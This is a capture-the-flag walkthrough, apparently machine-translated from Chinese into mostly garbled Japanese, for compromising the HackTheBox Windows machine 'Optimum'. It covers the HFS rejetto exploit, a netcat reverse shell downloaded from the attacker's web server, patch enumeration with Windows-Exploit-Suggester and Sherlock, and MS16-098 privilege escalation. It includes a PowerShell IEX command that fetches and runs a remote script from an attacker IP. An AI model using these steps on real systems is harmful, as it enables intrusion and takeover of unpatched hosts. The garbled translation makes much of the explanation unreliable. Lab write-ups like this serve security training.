浸透学ぶNO.52-HackTheBox-Windowsの最適-チュートリアル

**

HackTheBox-Windowsの最適-チュートリアル

**

ドローンアドレスします。https://www.hackthebox.eu/home/machines/profile/6
ドローン難易度:ミディアム(4.7 / 10)
ドローン発売日:2017年10月3日
ドローン説明:
最適IS A初級主の列挙に焦点を当ててレベルのマシン完了するには、このマシンはかなり単純な作り、両方のエクスプロイトは、入手が容易であり、Metasploitのモジュールが関連付けられている利用知られてサービス...
著者:太夫の
時間:2020年2月12日
注:すべてのためにこれらのコンピュータは、私は、VMwareを実行しているコンピュータを使用してダウンロードしました。私は、攻撃者のマシンCTFに対する解決策として、カーリーのLinuxを使用します。ここだけの教育目的のために学習するための技術の使用は、技術は他の目的のためにリストされている場合、私は責任を負いかねます。

まず、情報収集

ここに画像を挿入説明
Windowsシステムのドローン...、IPのドローンが10.10.10.8で見ることができここに画像を挿入説明
nmapのが唯一開かれた80個のポートを見つけ、HttpFileServerのhttpd 2.3Webサーバー...(HFS(HTTPファイルサーバー)を使用して、送信することができますファイル共有ソフトウェアでありますそして、)ファイルを受信
ここに画像を挿入説明
、ここで...私は次の試みを活用見る提示ここに画像を挿入説明
使用することができますexploit/windows/http/rejetto_hfs_exec
ここに画像を挿入説明
缶を実行するために...
ここに画像を挿入説明
あなたが低いシェルを得るために右見ることができます... x64アーキテクチャを実行しているここにOPTIMUMた... MeterpreterはX86、x64のを変更する必要があることです...変更はpaylod ... ここに画像を挿入説明
後にも行うように変更...
ここに画像を挿入説明
首尾以上に変更されました...ユーザー検索
ここに画像を挿入説明
側成功ビューUSER.TXT(自身のプレーを発表していない)
ここに画像を挿入説明
案の定、右または低い状態が、ここでは管理者に直接入力することはできません...アップグレードするための許可Metasploitの...

使用Metasploitの権限のアップグレード

使用ポスト/マルチ/偵察/:ここで使用 local_exploit_suggester ...セッションを確立する
ここに画像を挿入説明
セッション2で、ここではなく、待ち時間は成功しません...
別の方法についてのキープ思考を...
あなたの前にそれまでのWindows 2012 R2を見るために... Googleのクエリが利用できた後ms16_032の
ここに画像を挿入説明
使用を...
ここに画像を挿入説明
セッションを選択...とペイロードを選択...
ここに画像を挿入説明
実行が...することができ
ここに画像を挿入説明
た、実行または作業...他の方法を考えていません...

NCは、低特権逆シェルを作成するために使用します

ここに画像を挿入説明
前面80端口扫描就发现是2.3的HFS,这里我都查看下这两个的内容…
ここに画像を挿入説明
ここに画像を挿入説明
可以看到这里更依赖于Web服务器下载来利用nc.exe获取反向Shell…
需要使用托管netcat的Web服务器:http://<attackers_ip>:80/nc.exe
ここに画像を挿入説明
和shell一样改成本地kali的IP即可…
ここに画像を挿入説明
ここに画像を挿入説明
将nc.exe复制到文件夹中来…
ここに画像を挿入説明
开启python服务,主要上传NC的…
ここに画像を挿入説明
这里利用了Nect机制进行本地提shell…(Ncat是一个功能丰富的网络实用程序,可从命令行跨网络读取和写入数据)
这边注意的是第三个窗口具有python漏洞利用程序必须得启用两次,一个触发nc.exe,另一个触发反向shell…
原理是:
python exploit(第3个窗口)将连接到python服务器(第1个窗口),以下载nc.exe Windows二进制文件,然后nc.exe在端口443(第二个窗口)上连接回Ncat侦听器,并将创建一个低特权反向外壳程序…
ここに画像を挿入説明
继续获取root.txt…

使用 GDSSecurity / Windows-Exploit-Suggester工具枚举KB

这边运用systeminfo查看下KB…ここに画像を挿入説明
这边使用Windows-Exploit-Suggester工具对目标补丁程序级别与Microsoft漏洞数据库进行比较,以检测目标上可能缺少的补丁程序…工具连接
ここに画像を挿入説明
讲解得很详细…开始操作
ここに画像を挿入説明
按照要求将ststeminfo信息保存在sysinfo.txt下,以及将windows…py文件放置本地…
ここに画像を挿入説明
ここに画像を挿入説明
然后使用–update标志从Microsoft自动下载安全公告数据库的功能,并将其另存为Excel电子表格…
这里没用安装xlrd记得使用:pip install xlrd 进行安装…
ここに画像を挿入説明
命令:python windows-exploit-suggester.py --systeminfo sysinfo.txt --database 2020-02-11-mssb.xls

可以看出补丁数量以及没打的补丁…
ここに画像を挿入説明
这边打算利用ms16_032…

使用Sherlock枚举KB

将使用Sherlock枚举计算机上的KB,这里利用Sherlock工具进行…(这里Sherlock是一个PowerShell脚本,可以快速查找缺少的软件补丁以解决本地特权升级漏洞…)链接
ここに画像を挿入説明
命令:git clone https://github.com/rasta-mouse/Sherlock
下载到本地后…
继续更改文件Sherlock.ps1并在Powershell脚本的末尾添加Find-Allvulns…
ここに画像を挿入説明
修改完后上传即可…ここに画像を挿入説明
命令:powershell wget "http://10.10.14.20/Sherlock/Sherlock.ps1"
成功上传…
ここに画像を挿入説明
命令:powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.20/Sherlock/Sherlock.ps1')
使用上面命令启动Sherlock,进行遍历windows的所有KB…
没发现有利用的,但是也是一种方式方法…

使用RGNOBJ整数溢出进行特权升级

続行...
ここに画像を挿入説明
ビュー、Microsoftのドキュメントを、あなたは、Windows 8.1に関連付けられているWindows Server 2012のR2を見つけ、同じビルド番号...がありますリンクを
ここに画像を挿入説明
グーグル経由ms16-098利用可能を見つける...
ここに画像を挿入説明
使用のWindows-エクスプロイト-提案者は、KBの前にあることを想起しfindsがケース...また、MicrosoftのWindows 8.1(x64)の発見- RGNOBJ整数オーバーフロー(MS16-098)が...
...引き続き使用する
ここに画像を挿入説明
カタログに、利用可能41020.cを表示...あなたはAと一緒に使用することができます悪用の景色を見ることができますコンパイル済みのWindowsバイナリ... 41020.exe
ここに画像を挿入説明
アップロード... ここに画像を挿入説明
成功した窓...にアップロード
ここに画像を挿入説明
ここに画像を挿入説明
成功root.txtコンテンツ...

朝刊後期!
あらゆるものを学び、私はたくさんのアイデアを紹介してきたに来て、それは、窓の浸透のために非常に便利です!

我々はこのようにシンプルなドローンを完了し、ビューUSER.TXTとroot.txtに成功したroot権限されているので、私はあなたがこの機械のように願って、学ぶための演習と一緒に、後半より挑戦的なマシンよりもあるだろう大に注力することを続けてください。

あなたはウェルカムメッセージの他の方法を持っている場合。そこに間違った場所ならば、あなたは私に言う必要があります。あなたが書き込み良いにこのブログを見つけた場合は、周りの人々を共有することを歓迎します。

ここに画像を挿入説明

公開された54元の記事 ウォンの賞賛9 ビュー10000 +

おすすめ

転載: blog.csdn.net/qq_34801745/article/details/104271390